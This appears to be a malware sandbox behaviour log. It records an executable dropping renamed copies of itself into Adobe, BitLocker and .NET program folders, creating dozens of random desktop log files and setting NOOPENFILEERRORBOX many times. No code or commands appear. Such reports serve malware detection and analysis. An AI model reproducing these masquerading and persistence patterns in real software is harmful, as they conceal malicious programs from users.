Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	File created: C:\Program Files\Adobe\Acrobat DC\JPOyDhPFIytu.exe	Jump to dropped file
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	File created: C:\Windows\BitLockerDiscoveryVolumeContents\JPOyDhPFIytu.exe	Jump to dropped file

Source: C:\Users\user\Desktop\yQrCGtNgsf.exe

File created: C:\Windows\BitLockerDiscoveryVolumeContents\JPOyDhPFIytu.exe

Jump to dropped file

Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	File created: C:\Users\user\Desktop\TzzXjEkC.log	Jump to dropped file
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	File created: C:\Users\user\Desktop\apDEhkEl.log	Jump to dropped file
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	File created: C:\Users\user\Desktop\yuIieleo.log	Jump to dropped file
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	File created: C:\Users\user\Desktop\pLpTuJYH.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\RdNoqiHi.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\lmQBfErr.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\UkLxLBCd.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\LCrhcYww.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\OzAXPueG.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\zuWaRqDn.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\pGrkhfIF.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\fXYUxCDX.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\mvOMxtrw.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\GJcAmyRG.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\waJkCVMY.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\oxAuScwr.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\MAAYLQkP.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\FTTrxXjd.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\vlAbNuev.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\edjwtIzh.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\IjLZavdG.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\cyaNQADQ.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\SKvXgoIi.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\BDesMBdT.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\dUDNIbMu.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\gcAWdtGq.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\eReVdbbp.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\VjLFuzVH.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\TLlpvaAw.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\WTjyQsvs.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\NkPigQpK.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\KZthgyKJ.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\RfcHRSFf.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\nzBVHGUq.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\eWtfXNEJ.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\VnZQnlzb.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\HPxsKDSZ.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\TADrPPcC.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\KRjbfmWU.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\zdFkvbcm.log	Jump to dropped file

Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
